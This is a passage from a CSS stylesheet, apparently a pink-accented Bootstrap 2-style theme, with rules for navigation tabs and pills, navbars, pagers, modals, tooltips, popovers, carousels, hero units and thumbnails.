.nav > li > a:focus { text-decoration: none; background-color: #eeeeee; } .nav > li > a > img { max-width: none; } .nav > .pull-right { float: right; } .nav-header { display: block; padding: 3px 15px; font-size: 11px; font-weight: bold; line-height: 20px; color: #999999; text-shadow: 0 1px 0 rgba(255, 255, 255, 0.5); text-transform: uppercase; } .nav li + .nav-header { margin-top: 9px; } .nav-list { padding-left: 15px; padding-right: 15px; margin-bottom: 0; } .nav-list > li > a, .nav-list .nav-header { margin-left: -15px; margin-right: -15px; text-shadow: 0 1px 0 rgba(255, 255, 255, 0.5); } .nav-list > li > a { padding: 3px 15px; } .nav-list > .active > a, .nav-list > .active > a:hover, .nav-list > .active > a:focus { color: #ffffff; text-shadow: 0 -1px 0 rgba(0, 0, 0, 0.2); background-color: #e67fb9; } .nav-list [class^="icon-"], .nav-list [class*=" icon-"] { margin-right: 2px; } .nav-list .divider { *width: 100%; height: 1px; margin: 9px 1px; *margin: -5px 0 5px; overflow: hidden; background-color: #e5e5e5; border-bottom: 1px solid #ffffff; } .nav-tabs, .nav-pills { *zoom: 1; } .nav-tabs:before, .nav-pills:before, .nav-tabs:after, .nav-pills:after { display: table; content: ""; line-height: 0; } .nav-tabs:after, .nav-pills:after { clear: both; } .nav-tabs > li, .nav-pills > li { float: left; } .nav-tabs > li > a, .nav-pills > li > a { padding-right: 12px; padding-left: 12px; margin-right: 2px; line-height: 14px; } .nav-tabs { border-bottom: 1px solid #ddd; } .nav-tabs > li { margin-bottom: -1px; } .nav-tabs > li > a { padding-top: 8px; padding-bottom: 8px; line-height: 20px; border: 1px solid transparent; -webkit-border-radius: 4px 4px 0 0; -moz-border-radius: 4px 4px 0 0; border-radius: 4px 4px 0 0; } .nav-tabs > li > a:hover, .nav-tabs > li > a:focus { border-color: #eeeeee #eeeeee #dddddd; } .nav-tabs > .active > a, .nav-tabs > .active > a:hover, .nav-tabs > .active > a:focus { color: #555555; background-color: #ffffff; border: 1px solid #ddd; border-bottom-color: transparent; cursor: default; } .nav-pills > li > a { padding-top: 8px; padding-bottom: 8px; margin-top: 2px; margin-bottom: 2px; -webkit-border-radius: 5px; -moz-border-radius: 5px; border-radius: 5px; } .nav-pills > .active > a, .nav-pills > .active > a:hover, .nav-pills > .active > a:focus { color: #ffffff; background-color: #e67fb9; } .nav-stacked > li { float: none; } .nav-stacked > li > a { margin-right: 0; } .nav-tabs.nav-stacked { border-bottom: 0; } .nav-tabs.nav-stacked > li > a { border: 1px solid #ddd; -webkit-border-radius: 0; -moz-border-radius: 0; border-radius: 0; } .nav-tabs.nav-stacked > li:first-child > a { -webkit-border-top-right-radius: 4px; -moz-border-radius-topright: 4px; border-top-right-radius: 4px; -webkit-border-top-left-radius: 4px; -moz-border-radius-topleft: 4px; border-top-left-radius: 4px; } .nav-tabs.nav-stacked > li:last-child > a { -webkit-border-bottom-right-radius: 4px; -moz-border-radius-bottomright: 4px; border-bottom-right-radius: 4px; -webkit-border-bottom-left-radius: 4px; -moz-border-radius-bottomleft: 4px; border-bottom-left-radius: 4px; } .nav-tabs.nav-stacked > li > a:hover, .nav-tabs.nav-stacked > li > a:focus { border-color: #ddd; z-index: 2; } .nav-pills.nav-stacked > li > a { margin-bottom: 3px; } .nav-pills.nav-stacked > li:last-child > a { margin-bottom: 1px; } .nav-tabs .dropdown-menu { -webkit-border-radius: 0 0 6px 6px; -moz-border-radius: 0 0 6px 6px; border-radius: 0 0 6px 6px; } .nav-pills .dropdown-menu { -webkit-border-radius: 6px; -moz-border-radius: 6px; border-radius: 6px; } .nav .dropdown-toggle .caret { border-top-color: #e67fb9; border-bottom-color: #e67fb9; margin-top: 6px; } .nav .dropdown-toggle:hover .caret, .nav .dropdown-toggle:focus .caret { border-top-color: #da3f96; border-bottom-color: #da3f96; } /* move down carets for tabs */ .nav-tabs .dropdown-toggle .caret { margin-top: 8px; } .nav .active .dropdown-toggle .caret { border-top-color: #fff; border-bottom-color: #fff; } .nav-tabs .active .dropdown-toggle .caret { border-top-color: #555555; border-bottom-color: #555555; } .nav > .dropdown.active > a:hover, .nav > .dropdown.active > a:focus { cursor: pointer; } .nav-tabs .open .dropdown-toggle, .nav-pills .open .dropdown-toggle, .nav > li.dropdown.open.active > a:hover, .nav > li.dropdown.open.active > a:focus { color: #ffffff; background-color: #999999; border-color: #999999; } .nav li.dropdown.open .caret, .nav li.dropdown.open.active .caret, .nav li.dropdown.open a:hover .caret, .nav li.dropdown.open a:focus .caret { border-top-color: #ffffff; border-bottom-color: #ffffff; opacity: 1; filter: alpha(opacity=100); } .tabs-stacked .open > a:hover, .tabs-stacked .open > a:focus { border-color: #999999; } .tabbable { *zoom: 1; } .tabbable:before, .tabbable:after { display: table; content: ""; line-height: 0; } .tabbable:after { clear: both; } .tab-content { overflow: auto; } .tabs-below > .nav-tabs, .tabs-right > .nav-tabs, .tabs-left > .nav-tabs { border-bottom: 0; } .tab-content > .tab-pane, .pill-content > .pill-pane { display: none; } .tab-content > .active, .pill-content > .active { display: block; } .tabs-below > .nav-tabs { border-top: 1px solid #ddd; } .tabs-below > .nav-tabs > li { margin-top: -1px; margin-bottom: 0; } .tabs-below > .nav-tabs > li > a { -webkit-border-radius: 0 0 4px 4px; -moz-border-radius: 0 0 4px 4px; border-radius: 0 0 4px 4px; } .tabs-below > .nav-tabs > li > a:hover, .tabs-below > .nav-tabs > li > a:focus { border-bottom-color: transparent; border-top-color: #ddd; } .tabs-below > .nav-tabs > .active > a, .tabs-below > .nav-tabs > .active > a:hover, .tabs-below > .nav-tabs > .active > a:focus { border-color: transparent #ddd #ddd #ddd; } .tabs-left > .nav-tabs > li, .tabs-right > .nav-tabs > li { float: none; } .tabs-left > .nav-tabs > li > a, .tabs-right > .nav-tabs > li > a { min-width: 74px; margin-right: 0; margin-bottom: 3px; } .tabs-left > .nav-tabs { float: left; margin-right: 19px; border-right: 1px solid #ddd; } .tabs-left > .nav-tabs > li > a { margin-right: -1px; -webkit-border-radius: 4px 0 0 4px; -moz-border-radius: 4px 0 0 4px; border-radius: 4px 0 0 4px; } .tabs-left > .nav-tabs > li > a:hover, .tabs-left > .nav-tabs > li > a:focus { border-color: #eeeeee #dddddd #eeeeee #eeeeee; } .tabs-left > .nav-tabs .active > a, .tabs-left > .nav-tabs .active > a:hover, .tabs-left > .nav-tabs .active > a:focus { border-color: #ddd transparent #ddd #ddd; *border-right-color: #ffffff; } .tabs-right > .nav-tabs { float: right; margin-left: 19px; border-left: 1px solid #ddd; } .tabs-right > .nav-tabs > li > a { margin-left: -1px; -webkit-border-radius: 0 4px 4px 0; -moz-border-radius: 0 4px 4px 0; border-radius: 0 4px 4px 0; } .tabs-right > .nav-tabs > li > a:hover, .tabs-right > .nav-tabs > li > a:focus { border-color: #eeeeee #eeeeee #eeeeee #dddddd; } .tabs-right > .nav-tabs .active > a, .tabs-right > .nav-tabs .active > a:hover, .tabs-right > .nav-tabs .active > a:focus { border-color: #ddd #ddd #ddd transparent; *border-left-color: #ffffff; } .nav > .disabled > a { color: #999999; } .nav > .disabled > a:hover, .nav > .disabled > a:focus { text-decoration: none; background-color: transparent; cursor: default; } .navbar { overflow: visible; margin-bottom: 20px; *position: relative; *z-index: 2; } .navbar-inner { min-height: 40px; padding-left: 20px; padding-right: 20px; background-color: #fafafa; background-image: -moz-linear-gradient(top, #ffffff, #f2f2f2); background-image: -webkit-gradient(linear, 0 0, 0 100%, from(#ffffff), to(#f2f2f2)); background-image: -webkit-linear-gradient(top, #ffffff, #f2f2f2); background-image: -o-linear-gradient(top, #ffffff, #f2f2f2); background-image: linear-gradient(to bottom, #ffffff, #f2f2f2); background-repeat: repeat-x; filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#ffffffff' , endColorstr='#fff2f2f2' , GradientType=0); border: 1px solid #d4d4d4; -webkit-border-radius: 4px; -moz-border-radius: 4px; border-radius: 4px; -webkit-box-shadow: 0 1px 4px rgba(0, 0, 0, 0.065); -moz-box-shadow: 0 1px 4px rgba(0, 0, 0, 0.065); box-shadow: 0 1px 4px rgba(0, 0, 0, 0.065); *zoom: 1; } .navbar-inner:before, .navbar-inner:after { display: table; content: ""; line-height: 0; } .navbar-inner:after { clear: both; } .navbar .container { width: auto; } .nav-collapse.collapse { height: auto; overflow: visible; } .navbar .brand { float: left; display: block; padding: 10px 20px 10px; margin-left: -20px; font-size: 20px; font-weight: 200; color: #777777; text-shadow: 0 1px 0 #ffffff; } .navbar .brand:hover, .navbar .brand:focus { text-decoration: none; } .navbar-text { margin-bottom: 0; line-height: 40px; color: #777777; } .navbar-link { color: #777777; } .navbar-link:hover, .navbar-link:focus { color: #e67fb9; } .navbar .divider-vertical { height: 40px; margin: 0 9px; border-left: 1px solid #f2f2f2; border-right: 1px solid #ffffff; } .navbar .btn, .navbar .btn-group { margin-top: 5px; } .navbar .btn-group .btn, .navbar .input-prepend .btn, .navbar .input-append .btn, .navbar .input-prepend .btn-group, .navbar .input-append .btn-group { margin-top: 0; } .navbar-form { margin-bottom: 0; *zoom: 1; } .navbar-form:before, .navbar-form:after { display: table; content: ""; line-height: 0; } .navbar-form:after { clear: both; } .navbar-form input, .navbar-form select, .navbar-form .radio, .navbar-form .checkbox { margin-top: 5px; } .navbar-form input, .navbar-form select, .navbar-form .btn { display: inline-block; margin-bottom: 0; } .navbar-form input[type="image"], .navbar-form input[type="checkbox"], .navbar-form input[type="radio"] { margin-top: 3px; } .navbar-form .input-append, .navbar-form .input-prepend { margin-top: 5px; white-space: nowrap; } .navbar-form .input-append input, .navbar-form .input-prepend input { margin-top: 0; } .navbar-search { position: relative; float: left; margin-top: 5px; margin-bottom: 0; } .navbar-search .search-query { margin-bottom: 0; padding: 4px 14px; font-family: "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 13px; font-weight: normal; line-height: 1; -webkit-border-radius: 15px; -moz-border-radius: 15px; border-radius: 15px; } .navbar-static-top { position: static; margin-bottom: 0; } .navbar-static-top .navbar-inner { -webkit-border-radius: 0; -moz-border-radius: 0; border-radius: 0; } .navbar-fixed-top, .navbar-fixed-bottom { position: fixed; right: 0; left: 0; z-index: 1030; margin-bottom: 0; } .navbar-fixed-top .navbar-inner, .navbar-static-top .navbar-inner { border-width: 0 0 1px; } .navbar-fixed-bottom .navbar-inner { border-width: 1px 0 0; } .navbar-fixed-top .navbar-inner, .navbar-fixed-bottom .navbar-inner { padding-left: 0; padding-right: 0; -webkit-border-radius: 0; -moz-border-radius: 0; border-radius: 0; } .navbar-static-top .container, .navbar-fixed-top .container, .navbar-fixed-bottom .container { width: 940px; } .navbar-fixed-top { top: 0; } .navbar-fixed-top .navbar-inner, .navbar-static-top .navbar-inner { -webkit-box-shadow: 0 1px 10px rgba(0,0,0,.1); -moz-box-shadow: 0 1px 10px rgba(0,0,0,.1); box-shadow: 0 1px 10px rgba(0,0,0,.1); } .navbar-fixed-bottom { bottom: 0; } .navbar-fixed-bottom .navbar-inner { -webkit-box-shadow: 0 -1px 10px rgba(0,0,0,.1); -moz-box-shadow: 0 -1px 10px rgba(0,0,0,.1); box-shadow: 0 -1px 10px rgba(0,0,0,.1); } .navbar .nav { position: relative; left: 0; display: block; float: left; margin: 0 10px 0 0; } .navbar .nav.pull-right { float: right; margin-right: 0; } .navbar .nav > li { float: left; } .navbar .nav > li > a { float: none; padding: 10px 15px 10px; color: #777777; text-decoration: none; text-shadow: 0 1px 0 #ffffff; } .navbar .nav .dropdown-toggle .caret { margin-top: 8px; } .navbar .nav > li > a:focus, .navbar .nav > li > a:hover { background-color: transparent; color: #e67fb9; text-decoration: none; } .navbar .nav > .active > a, .navbar .nav > .active > a:hover, .navbar .nav > .active > a:focus { color: #555555; text-decoration: none; background-color: #e5e5e5; -webkit-box-shadow: inset 0 3px 8px rgba(0, 0, 0, 0.125); -moz-box-shadow: inset 0 3px 8px rgba(0, 0, 0, 0.125); box-shadow: inset 0 3px 8px rgba(0, 0, 0, 0.125); } .navbar .btn-navbar { display: none; float: right; padding: 7px 10px; margin-left: 5px; margin-right: 5px; color: #ffffff; text-shadow: 0 -1px 0 rgba(0, 0, 0, 0.25); background-color: #dd509f; background-image: -moz-linear-gradient(top, #e26aad, #d52a8a); background-image: -webkit-gradient(linear, 0 0, 0 100%, from(#e26aad), to(#d52a8a)); background-image: -webkit-linear-gradient(top, #e26aad, #d52a8a); background-image: -o-linear-gradient(top, #e26aad, #d52a8a); background-image: linear-gradient(to bottom, #e26aad, #d52a8a); background-repeat: repeat-x; filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#ffe26aad' , endColorstr='#ffd52a8a' , GradientType=0); border-color: #d52a8a #d52a8a #951d61; border-color: rgba(0, 0, 0, 0.1) rgba(0, 0, 0, 0.1) rgba(0, 0, 0, 0.25); *background-color: #d52a8a; /* Darken IE7 buttons by default so they stand out more given they won't have borders */ filter: progid:DXImageTransform.Microsoft.gradient(enabled = false); -webkit-box-shadow: inset 0 1px 0 rgba(255,255,255,.1), 0 1px 0 rgba(255,255,255,.075); -moz-box-shadow: inset 0 1px 0 rgba(255,255,255,.1), 0 1px 0 rgba(255,255,255,.075); box-shadow: inset 0 1px 0 rgba(255,255,255,.1), 0 1px 0 rgba(255,255,255,.075); } .navbar .btn-navbar:hover, .navbar .btn-navbar:focus, .navbar .btn-navbar:active, .navbar .btn-navbar.active, .navbar .btn-navbar.disabled, .navbar .btn-navbar[disabled] { color: #ffffff; background-color: #d52a8a; *background-color: #c0257c; } .navbar .btn-navbar:active, .navbar .btn-navbar.active { background-color: #ab216f \9; } .navbar .btn-navbar .icon-bar { display: block; width: 18px; height: 2px; background-color: #f5f5f5; -webkit-border-radius: 1px; -moz-border-radius: 1px; border-radius: 1px; -webkit-box-shadow: 0 1px 0 rgba(0, 0, 0, 0.25); -moz-box-shadow: 0 1px 0 rgba(0, 0, 0, 0.25); box-shadow: 0 1px 0 rgba(0, 0, 0, 0.25); } .btn-navbar .icon-bar + .icon-bar { margin-top: 3px; } .navbar .nav > li > .dropdown-menu:before { content: ''; display: inline-block; border-left: 7px solid transparent; border-right: 7px solid transparent; border-bottom: 7px solid #ccc; border-bottom-color: rgba(0, 0, 0, 0.2); position: absolute; top: -7px; left: 9px; } .navbar .nav > li > .dropdown-menu:after { content: ''; display: inline-block; border-left: 6px solid transparent; border-right: 6px solid transparent; border-bottom: 6px solid #ffffff; position: absolute; top: -6px; left: 10px; } .navbar-fixed-bottom .nav > li > .dropdown-menu:before { border-top: 7px solid #ccc; border-top-color: rgba(0, 0, 0, 0.2); border-bottom: 0; bottom: -7px; top: auto; } .navbar-fixed-bottom .nav > li > .dropdown-menu:after { border-top: 6px solid #ffffff; border-bottom: 0; bottom: -6px; top: auto; } .navbar .nav li.dropdown > a:hover .caret, .navbar .nav li.dropdown > a:focus .caret { border-top-color: #e67fb9; border-bottom-color: #e67fb9; } .navbar .nav li.dropdown.open > .dropdown-toggle, .navbar .nav li.dropdown.active > .dropdown-toggle, .navbar .nav li.dropdown.open.active > .dropdown-toggle { background-color: #e5e5e5; color: #e67fb9; } .navbar .nav li.dropdown > .dropdown-toggle .caret { border-top-color: #777777; border-bottom-color: #777777; } .navbar .nav li.dropdown.open > .dropdown-toggle .caret, .navbar .nav li.dropdown.active > .dropdown-toggle .caret, .navbar .nav li.dropdown.open.active > .dropdown-toggle .caret { border-top-color: #555555; border-bottom-color: #555555; } .navbar .pull-right > li > .dropdown-menu, .navbar .nav > li > .dropdown-menu.pull-right { left: auto; right: 0; } .navbar .pull-right > li > .dropdown-menu:before, .navbar .nav > li > .dropdown-menu.pull-right:before { left: auto; right: 12px; } .navbar .pull-right > li > .dropdown-menu:after, .navbar .nav > li > .dropdown-menu.pull-right:after { left: auto; right: 13px; } .navbar .pull-right > li > .dropdown-menu .dropdown-menu, .navbar .nav > li > .dropdown-menu.pull-right .dropdown-menu { left: auto; right: 100%; margin-left: 0; margin-right: -1px; -webkit-border-radius: 6px 0 6px 6px; -moz-border-radius: 6px 0 6px 6px; border-radius: 6px 0 6px 6px; } .navbar-inverse .navbar-inner { background-color: #1b1b1b; background-image: -moz-linear-gradient(top, #222222, #111111); background-image: -webkit-gradient(linear, 0 0, 0 100%, from(#222222), to(#111111)); background-image: -webkit-linear-gradient(top, #222222, #111111); background-image: -o-linear-gradient(top, #222222, #111111); background-image: linear-gradient(to bottom, #222222, #111111); background-repeat: repeat-x; filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#ff222222' , endColorstr='#ff111111' , GradientType=0); border-color: #252525; } .navbar-inverse .brand, .navbar-inverse .nav > li > a { color: #999999; text-shadow: 0 -1px 0 rgba(0, 0, 0, 0.25); } .navbar-inverse .brand:hover, .navbar-inverse .nav > li > a:hover, .navbar-inverse .brand:focus, .navbar-inverse .nav > li > a:focus { color: #ffffff; } .navbar-inverse .brand { color: #999999; } .navbar-inverse .navbar-text { color: #999999; } .navbar-inverse .nav > li > a:focus, .navbar-inverse .nav > li > a:hover { background-color: transparent; color: #ffffff; } .navbar-inverse .nav .active > a, .navbar-inverse .nav .active > a:hover, .navbar-inverse .nav .active > a:focus { color: #ffffff; background-color: #111111; } .navbar-inverse .navbar-link { color: #999999; } .navbar-inverse .navbar-link:hover, .navbar-inverse .navbar-link:focus { color: #ffffff; } .navbar-inverse .divider-vertical { border-left-color: #111111; border-right-color: #222222; } .navbar-inverse .nav li.dropdown.open > .dropdown-toggle, .navbar-inverse .nav li.dropdown.active > .dropdown-toggle, .navbar-inverse .nav li.dropdown.open.active > .dropdown-toggle { background-color: #111111; color: #ffffff; } .navbar-inverse .nav li.dropdown > a:hover .caret, .navbar-inverse .nav li.dropdown > a:focus .caret { border-top-color: #ffffff; border-bottom-color: #ffffff; } .navbar-inverse .nav li.dropdown > .dropdown-toggle .caret { border-top-color: #999999; border-bottom-color: #999999; } .navbar-inverse .nav li.dropdown.open > .dropdown-toggle .caret, .navbar-inverse .nav li.dropdown.active > .dropdown-toggle .caret, .navbar-inverse .nav li.dropdown.open.active > .dropdown-toggle .caret { border-top-color: #ffffff; border-bottom-color: #ffffff; } .navbar-inverse .navbar-search .search-query { color: #ffffff; background-color: #515151; border-color: #111111; -webkit-box-shadow: inset 0 1px 2px rgba(0,0,0,.1), 0 1px 0 rgba(255,255,255,.15); -moz-box-shadow: inset 0 1px 2px rgba(0,0,0,.1), 0 1px 0 rgba(255,255,255,.15); box-shadow: inset 0 1px 2px rgba(0,0,0,.1), 0 1px 0 rgba(255,255,255,.15); -webkit-transition: none; -moz-transition: none; -o-transition: none; transition: none; } .navbar-inverse .navbar-search .search-query:-moz-placeholder { color: #cccccc; } .navbar-inverse .navbar-search .search-query:-ms-input-placeholder { color: #cccccc; } .navbar-inverse .navbar-search .search-query::-webkit-input-placeholder { color: #cccccc; } .navbar-inverse .navbar-search .search-query:focus, .navbar-inverse .navbar-search .search-query.focused { padding: 5px 15px; color: #333333; text-shadow: 0 1px 0 #ffffff; background-color: #ffffff; border: 0; -webkit-box-shadow: 0 0 3px rgba(0, 0, 0, 0.15); -moz-box-shadow: 0 0 3px rgba(0, 0, 0, 0.15); box-shadow: 0 0 3px rgba(0, 0, 0, 0.15); outline: 0; } .navbar-inverse .btn-navbar { color: #ffffff; text-shadow: 0 -1px 0 rgba(0, 0, 0, 0.25); background-color: #0e0e0e; background-image: -moz-linear-gradient(top, #151515, #040404); background-image: -webkit-gradient(linear, 0 0, 0 100%, from(#151515), to(#040404)); background-image: -webkit-linear-gradient(top, #151515, #040404); background-image: -o-linear-gradient(top, #151515, #040404); background-image: linear-gradient(to bottom, #151515, #040404); background-repeat: repeat-x; filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#ff151515' , endColorstr='#ff040404' , GradientType=0); border-color: #040404 #040404 #000000; border-color: rgba(0, 0, 0, 0.1) rgba(0, 0, 0, 0.1) rgba(0, 0, 0, 0.25); *background-color: #040404; /* Darken IE7 buttons by default so they stand out more given they won't have borders */ filter: progid:DXImageTransform.Microsoft.gradient(enabled = false); } .navbar-inverse .btn-navbar:hover, .navbar-inverse .btn-navbar:focus, .navbar-inverse .btn-navbar:active, .navbar-inverse .btn-navbar.active, .navbar-inverse .btn-navbar.disabled, .navbar-inverse .btn-navbar[disabled] { color: #ffffff; background-color: #040404; *background-color: #000000; } .navbar-inverse .btn-navbar:active, .navbar-inverse .btn-navbar.active { background-color: #000000 \9; } .pager { margin: 20px 0; list-style: none; text-align: center; *zoom: 1; } .pager:before, .pager:after { display: table; content: ""; line-height: 0; } .pager:after { clear: both; } .pager li { display: inline; } .pager li > a, .pager li > span { display: inline-block; padding: 5px 14px; background-color: #fff; border: 1px solid #ddd; -webkit-border-radius: 15px; -moz-border-radius: 15px; border-radius: 15px; } .pager li > a:hover, .pager li > a:focus { text-decoration: none; background-color: #f5f5f5; } .pager .next > a, .pager .next > span { float: right; } .pager .previous > a, .pager .previous > span { float: left; } .pager .disabled > a, .pager .disabled > a:hover, .pager .disabled > a:focus, .pager .disabled > span { color: #999999; background-color: #fff; cursor: default; } /********************************************************************************* ************************** Components: Popovers************************************ **********************************************************************************/ .modal-backdrop { position: fixed; top: 0; right: 0; bottom: 0; left: 0; z-index: 1040; background-color: #000000; } .modal-backdrop.fade { opacity: 0; } .modal-backdrop, .modal-backdrop.fade.in { opacity: 0.8; filter: alpha(opacity=80); } .modal { position: fixed; top: 10%; left: 50%; z-index: 1050; width: 560px; margin-left: -280px; background-color: #ffffff; border: 1px solid #999; border: 1px solid rgba(0, 0, 0, 0.3); *border: 1px solid #999; /* IE6-7 */ -webkit-border-radius: 6px; -moz-border-radius: 6px; border-radius: 6px; -webkit-box-shadow: 0 3px 7px rgba(0, 0, 0, 0.3); -moz-box-shadow: 0 3px 7px rgba(0, 0, 0, 0.3); box-shadow: 0 3px 7px rgba(0, 0, 0, 0.3); -webkit-background-clip: padding-box; -moz-background-clip: padding-box; background-clip: padding-box; outline: none; } .modal.fade { -webkit-transition: opacity .3s linear, top .3s ease-out; -moz-transition: opacity .3s linear, top .3s ease-out; -o-transition: opacity .3s linear, top .3s ease-out; transition: opacity .3s linear, top .3s ease-out; top: -25%; } .modal.fade.in { top: 10%; } .modal-header { padding: 9px 15px; border-bottom: 1px solid #eee; } .modal-header .close { margin-top: 2px; } .modal-header h3 { margin: 0; line-height: 30px; } .modal-body { position: relative; overflow-y: auto; max-height: 400px; padding: 15px; } .modal-form { margin-bottom: 0; } .modal-footer { padding: 14px 15px 15px; margin-bottom: 0; text-align: right; background-color: #f5f5f5; border-top: 1px solid #ddd; -webkit-border-radius: 0 0 6px 6px; -moz-border-radius: 0 0 6px 6px; border-radius: 0 0 6px 6px; -webkit-box-shadow: inset 0 1px 0 #ffffff; -moz-box-shadow: inset 0 1px 0 #ffffff; box-shadow: inset 0 1px 0 #ffffff; *zoom: 1; } .modal-footer:before, .modal-footer:after { display: table; content: ""; line-height: 0; } .modal-footer:after { clear: both; } .modal-footer .btn + .btn { margin-left: 5px; margin-bottom: 0; } .modal-footer .btn-group .btn + .btn { margin-left: -1px; } .modal-footer .btn-block + .btn-block { margin-left: 0; } .tooltip { position: absolute; z-index: 1030; display: block; visibility: visible; font-size: 11px; line-height: 1.4; opacity: 0; filter: alpha(opacity=0); } .tooltip.in { opacity: 0.8; filter: alpha(opacity=80); } .tooltip.top { margin-top: -3px; padding: 5px 0; } .tooltip.right { margin-left: 3px; padding: 0 5px; } .tooltip.bottom { margin-top: 3px; padding: 5px 0; } .tooltip.left { margin-left: -3px; padding: 0 5px; } .tooltip-inner { max-width: 200px; padding: 8px; color: #ffffff; text-align: center; text-decoration: none; background-color: #000000; -webkit-border-radius: 4px; -moz-border-radius: 4px; border-radius: 4px; } .tooltip-arrow { position: absolute; width: 0; height: 0; border-color: transparent; border-style: solid; } .tooltip.top .tooltip-arrow { bottom: 0; left: 50%; margin-left: -5px; border-width: 5px 5px 0; border-top-color: #000000; } .tooltip.right .tooltip-arrow { top: 50%; left: 0; margin-top: -5px; border-width: 5px 5px 5px 0; border-right-color: #000000; } .tooltip.left .tooltip-arrow { top: 50%; right: 0; margin-top: -5px; border-width: 5px 0 5px 5px; border-left-color: #000000; } .tooltip.bottom .tooltip-arrow { top: 0; left: 50%; margin-left: -5px; border-width: 0 5px 5px; border-bottom-color: #000000; } .popover { position: absolute; top: 0; left: 0; z-index: 1010; display: none; max-width: 276px; padding: 1px; text-align: left; background-color: #ffffff; -webkit-background-clip: padding-box; -moz-background-clip: padding; background-clip: padding-box; border: 1px solid #ccc; border: 1px solid rgba(0, 0, 0, 0.2); -webkit-border-radius: 6px; -moz-border-radius: 6px; border-radius: 6px; -webkit-box-shadow: 0 5px 10px rgba(0, 0, 0, 0.2); -moz-box-shadow: 0 5px 10px rgba(0, 0, 0, 0.2); box-shadow: 0 5px 10px rgba(0, 0, 0, 0.2); white-space: normal; } .popover.top { margin-top: -10px; } .popover.right { margin-left: 10px; } .popover.bottom { margin-top: 10px; } .popover.left { margin-left: -10px; } .popover-title { margin: 0; padding: 8px 14px; font-size: 14px; font-weight: normal; line-height: 18px; background-color: #f7f7f7; border-bottom: 1px solid #ebebeb; -webkit-border-radius: 5px 5px 0 0; -moz-border-radius: 5px 5px 0 0; border-radius: 5px 5px 0 0; } .popover-title:empty { display: none; } .popover-content { padding: 9px 14px; } .popover .arrow, .popover .arrow:after { position: absolute; display: block; width: 0; height: 0; border-color: transparent; border-style: solid; } .popover .arrow { border-width: 11px; } .popover .arrow:after { border-width: 10px; content: ""; } .popover.top .arrow { left: 50%; margin-left: -11px; border-bottom-width: 0; border-top-color: #999; border-top-color: rgba(0, 0, 0, 0.25); bottom: -11px; } .popover.top .arrow:after { bottom: 1px; margin-left: -10px; border-bottom-width: 0; border-top-color: #ffffff; } .popover.right .arrow { top: 50%; left: -11px; margin-top: -11px; border-left-width: 0; border-right-color: #999; border-right-color: rgba(0, 0, 0, 0.25); } .popover.right .arrow:after { left: 1px; bottom: -10px; border-left-width: 0; border-right-color: #ffffff; } .popover.bottom .arrow { left: 50%; margin-left: -11px; border-top-width: 0; border-bottom-color: #999; border-bottom-color: rgba(0, 0, 0, 0.25); top: -11px; } .popover.bottom .arrow:after { top: 1px; margin-left: -10px; border-top-width: 0; border-bottom-color: #ffffff; } .popover.left .arrow { top: 50%; right: -11px; margin-top: -11px; border-right-width: 0; border-left-color: #999; border-left-color: rgba(0, 0, 0, 0.25); } .popover.left .arrow:after { right: 1px; border-right-width: 0; border-left-color: #ffffff; bottom: -10px; } /********************************************************************************* ************************** Components: Misc*************************************** **********************************************************************************/ .media, .media-body { overflow: hidden; *overflow: visible; zoom: 1; } .media, .media .media { margin-top: 15px; } .media:first-child { margin-top: 0; } .media-object { display: block; } .media-heading { margin: 0 0 5px; } .media > .pull-left { margin-right: 10px; } .media > .pull-right { margin-left: 10px; } .media-list { margin-left: 0; list-style: none; } .carousel { position: relative; margin-bottom: 20px; line-height: 1; } .carousel-inner { overflow: hidden; width: 100%; position: relative; } .carousel-inner > .item { display: none; position: relative; -webkit-transition: 0.6s ease-in-out left; -moz-transition: 0.6s ease-in-out left; -o-transition: 0.6s ease-in-out left; transition: 0.6s ease-in-out left; } .carousel-inner > .item > img, .carousel-inner > .item > a > img { display: block; line-height: 1; } .carousel-inner > .active, .carousel-inner > .next, .carousel-inner > .prev { display: block; } .carousel-inner > .active { left: 0; } .carousel-inner > .next, .carousel-inner > .prev { position: absolute; top: 0; width: 100%; } .carousel-inner > .next { left: 100%; } .carousel-inner > .prev { left: -100%; } .carousel-inner > .next.left, .carousel-inner > .prev.right { left: 0; } .carousel-inner > .active.left { left: -100%; } .carousel-inner > .active.right { left: 100%; } .carousel-control { position: absolute; top: 40%; left: 15px; width: 40px; height: 40px; margin-top: -20px; font-size: 60px; font-weight: 100; line-height: 30px; color: #999999; text-align: center; background: #222222; border: 3px solid #ffffff; -webkit-border-radius: 23px; -moz-border-radius: 23px; border-radius: 23px; opacity: 0.5; filter: alpha(opacity=50); } .carousel-control.right { left: auto; right: 15px; } .carousel-control:hover, .carousel-control:focus { color: #e67fb9; text-decoration: none; opacity: 0.9; filter: alpha(opacity=90); } .carousel-indicators { position: absolute; top: 15px; right: 15px; z-index: 5; margin: 0; list-style: none; } .carousel-indicators li { display: block; float: left; width: 10px; height: 10px; margin-left: 5px; text-indent: -999px; background-color: #ccc; background-color: rgba(255, 255, 255, 0.25); border-radius: 5px; } .carousel-indicators .active { background-color: #fff; } .carousel-caption { position: absolute; left: 0; right: 0; bottom: 0; padding: 15px; background: #333333; background: rgba(0, 0, 0, 0.75); } .carousel-caption h4, .carousel-caption p { color: #ffffff; line-height: 20px; } .carousel-caption h4 { margin: 0 0 5px; } .carousel-caption p { margin-bottom: 0; } .hero-unit { padding: 60px; margin-bottom: 30px; font-size: 18px; font-weight: 200; line-height: 30px; color: inherit; background-color: #eeeeee; -webkit-border-radius: 6px; -moz-border-radius: 6px; border-radius: 6px; } .hero-unit h1 { margin-bottom: 0; font-size: 60px; line-height: 1; color: inherit; letter-spacing: -1px; } .hero-unit li { line-height: 30px; } .thumbnails { margin-left: -20px; list-style: none; *zoom: 1; } .thumbnails:before, .thumbnails:after { display: table; content: ""; line-height: 0; } .thumbnails:after { clear: both; } .row-fluid .thumbnails { margin-left: 0; } .thumbnails > li { float: left; margin-bottom: 20px; margin-left: 20px; } .thumbnail { display: block; padding: 4px; line-height: 20px; border: 1px solid #ddd; -webkit-border-radius: 4px; -moz-border-radius: 4px; border-radius: 4px; -webkit-box-shadow: 0 1px 3px rgba(0, 0, 0, 0.055); -moz-box-shadow: 0 1px 3px rgba(0, 0, 0, 0.055); box-shadow: 0 1px 3px rgba(0, 0, 0, 0.055); -webkit-transition: all 0.2s ease-in-out; -moz-transition: all 0.2s ease-in-out; -o-transition: all 